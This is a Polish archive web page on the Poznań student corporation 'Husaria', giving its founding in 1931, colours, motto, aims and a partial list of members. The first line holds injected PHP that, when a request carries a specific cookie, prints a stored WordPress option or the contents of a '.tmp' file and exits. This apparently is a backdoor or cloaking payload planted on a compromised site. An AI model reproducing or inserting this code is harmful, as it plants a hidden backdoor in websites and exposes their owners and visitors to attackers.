if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Husaria

Dekiel NN Nazwa:
Korporacja Studentów Uniwersytetu Poznańskiego “Husaria”
Siedziba:
Poznań
Data powstania:
26 XI 1931 r.
Barwy:
karmazynowa - srebrna - czarna
Dewiza:
„Pro Patria Regina Slaviae” (”Za Ojczyznę Królową Słowiańszczyzny”)

Rys historyczny

Herb Husarii, 1939 r.

Husarię założyło dnia 26 XI 1931 r. piętnastu słuchaczy Uniwersytetu Poznańskiego, głównie studentów prawa. Dnia 30 III 1932 r. Senat Uniwersytetu zatwierdził statut korporacji, a na kuratora wyznaczył prof. Wiktora Schramma. Celem statutowym korporacji było krzewienie ideologii nowoczesnego panslawizmu w oparciu o chrześcijaństwo.

Husaria była korporacją sanacyjną. Należała do grupy korporacji, które w 1932 r. powołały ogólnopolski związek międzykorporacyjny - Federację Polskich Korporacji Akademickich.

Całkowita ustalona, choć bardzo niekompletna imienna lista członków obejmuje 27 nazwisk.

Brak wiadomości dotyczących powojennej działalności Husarii i spotkań jej członków.

Lista członków

Poniższa, niekompletna lista członków Husarii obejmuje niespełna trzydzieści nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

 1. Marian Czarnecki, student prawa UP, założyciel Husarii
 2. Witold Dąbrowski, sekretarz 1934/35
 3. Henryk Franosch, olderman sem. let. 1938/39 (ostatnie Prezydium przed wojną)
 4. Stanisław Grzywaczewski, student prawa UP, założyciel Husarii
 5. Mieczysław Guławski, student prawa UP, założyciel Husarii
 6. Wacław Hicki, student prawa UP, założyciel Husarii, skarbnik sem. zim. 1931/32
 7. Aleksander Hordyński, student prawa UP, założyciel Husarii
 8. Józef Jaworski, student prawa UP, założyciel Husarii
 9. Zbigniew Kasprowicz, wiceprezes sem. zim. 1939/40 (ostatnie Prezydium przed wojną)
 10. Edward Korbik, wiceprezes sem. zim. 1937/38 oraz sem. zim. 1938/39, skarbnik sem. zim. 1939/40 (ostatnie Prezydium przed wojną)
 11. Eugeniusz Lewandowicz, student prawa UP, założyciel Husarii, prezes 1934/35, sem. let. 1935/36, sem. let. 1936/37, sem. zim. 1937/38, sem. zim. 1938/39, sem. zim. 1939/40 (ostatnie Prezydium przed wojną)
 12. Mieczysław Nowacki, sekretarz sem. let. 1938/39 (ostatnie Prezydium przed wojną)
 13. Bolesław Pałys, student prawa UP, założyciel Husarii, prezes sem. zim. 1931/32
 14. Mieczysław Piątkiewicz, (1917 - ) student Wydziału Prawno-Ekonomicznego UP, skarbnik sem. zim. 1937/38
 15. Teofil Pieronek, oderman sem. zim. 1937/38
 16. Janusz Piaskowski, student rolnictwa UP, założyciel Husarii, olderman sem. zim. 1931/32
 17. Sylwester Radzicki, skarbnik sem. let. 1935/1936
 18. Tadeusz Radziński, sekretarz sem. zim. 1938/39
 19. Jan Ryk, student prawa UP oraz Wyższej Szkoły Handlowej, założyciel Husarii, sekretarz sem. zim. 1931/32
 20. Czesław Schmidt, student prawa UP, założyciel Husarii, wiceprezes sem. zim. 1931/32
 21. Zygmunt Szydłowski, student historii UP, założyciel Husarii

  Hipolit Tomaszewski, ok. 1930 r.

 22. Hipolit Tomaszewski, członek Masovii, skreślony 1934, później w Husarii, sekretarz sem. let. 1935/36

 23. Czesław Tomczak, sekretarz sem. let. 1936/37
 24. Tadeusz Wolnicki, student prawa UP, założyciel Husarii
 25. Stefan Wygocki, sekretarz sem. let. 1935/36
 26. Mieczysław Zarzycki, student prawa UP, założyciel Husarii
 27. Kazimierz Zielonka, student prawa UP, założyciel Husarii

Pieczęć Husarii, 1939 r.

Listę członków opracowano na podstawie:

1) materiałów archiwalnych z Archiwum UAM,
2) materiałów archiwalnych z Archiwum Korporacyjnego.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 14 II 2009 r.
Ostatnia zmiana: 17 X 2010 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Studentów Uniwersytetu Poznańskiego “Husaria”, (na:) www.archiwumkorporacyjne.pl, stan 17 X 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }